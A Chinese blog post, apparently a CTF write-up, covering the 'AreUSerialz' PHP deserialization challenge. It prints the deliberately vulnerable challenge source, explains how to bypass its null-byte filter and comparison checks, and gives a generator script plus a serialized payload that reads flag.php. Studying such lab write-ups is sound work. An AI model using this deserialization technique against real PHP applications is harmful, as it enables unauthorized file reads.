当前位置:网站首页>[网鼎杯 2020 青龙组]AreUSerialz
[网鼎杯 2020 青龙组]AreUSerialz
2022-08-10 01:01:00 【努力做大佬m0_68074153】
1.代码审计
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{
'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
通过GET传入参数str,对参数进行序列化,并对传入参数使用is_valid()函数进行检测字符的ascll马在32到125之间。上面是定义的需要反序化的对象。当op==‘1’时会调用write方法并输出一些没什么用的字符后结束,当op==‘2’时会调用read方法读取$filename文件并赋值给$res输出。当op===‘2’时会执行__destruct函数并对op进行赋值为‘1’。
2.ascll码绕过
protected定义的变量在反序化后会在变量名后输出看不见的%00空白字符,ascll码默认为零,会被is_valid函数拦截。有两种绕过方式。
1.php7.1后对变量属性不敏感,换成public定义变量则不会产生%00字符,实现绕过。
2.利用大写S采用的16进制,来绕过is_valid中对空字节的检查。这个比较复杂这里主要用第一种。
3.弱比较强比较
检查op===‘2’时使用的是强比较,检查op==‘1’时使用的是弱比较,我们不能让op=‘2’执行__destruct函数并对op进行赋值为‘1’,也不能让op=‘1’执行write方法后结束,可以将op赋值为int型的2,从而绕过强比较的‘2’,和弱比较的‘1’。
最后的反序化变量为:
<?php
class FileHandler {
public $op=2;
public $filename='flag.php';
public $content;
}
$b=new FileHandler();
$a=serialize($b);
echo $a;
?>
执行后得到payload:
O:11:"FileHandler":3:{
s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
传入后查看源码getflag。
边栏推荐
- 【kali-密码攻击】(5.2.1)密码分析:Hash Identifier(哈希识别)
- OpenSSF的开源软件风险评估工具:Scorecards
- 使用 apxs 构建和安装 Apache 扩展共享对象模块
- pyhton之问~~~~~if __name__ == ‘__main__‘:是什么?
- RedHat红帽RHEL7安装与使用,VMware Workstation16 Pro虚拟机的安装与使用
- 手把手教你编写性能测试用例
- Pyscript,创建一个能执行crud操作的网页应用
- 五种定位——粘性定位
- UI遍历的初步尝试
- R语言使用coxph函数构建生存分析回归模型,使用forestmodel包的forest_model函数可视化生存回归模型对应的森林图
猜你喜欢
Premint工具,作为普通人我们需要了解哪些内容?
Initial attempt at UI traversal
[论文阅读] Multimodal Unsupervised Image-to-Image Translation
改变社交与工作状态的即时通讯是什么呢?
Research on Ethernet PHY Chip LAN8720A Chip
Solidity最强对手:MOVE语言及新公链崛起
03|Process Control
unity 报错 Unsafe code may only appear if compiling with /unsafe. Enable “Allow ‘unsafe‘ code“ in Pla
将string类对象中的内容格式化到字符串Buffer中时遇到的异常崩溃分析
Teach you how to write performance test cases
随机推荐
C# 四舍五入 MidpointRounding.AwayFromZero
【UNR #6 C】稳健型选手(分治)(主席树)(二分)
C# rounding MidpointRounding.AwayFromZero
Interlay集成至Moonbeam,为网络带来interBTC和INTR
oracle的数据导入导出
XSS高级 svg 复现一个循环问题以及两个循环问题
什么是一网统管?终于有人讲明白了
hint: Updates were rejected because the tip of your current branch is behind hint: its remote counte
R语言使用glm函数构建逻辑回归模型(logistic)、使用subgroupAnalysis函数进行亚组分析并可视化森林图
多线程之享元模式和final原理
基于设计稿识别的可视化低代码系统实践
使用 GoogleTest 框架对 C 代码进行单元测试
【ROS2原理10】Interface数据的规定
y92.第六章 微服务、服务网格及Envoy实战 -- Envoy基础(三)
How to add control panel to right click menu in win7
Summary of Web Performance Testing Models
Solve the problem of sed replacement text containing special characters such as "/" and "#"
什么是持续测试?
空间复杂度为O(1)的归并排序
Shader Graph learns various special effects cases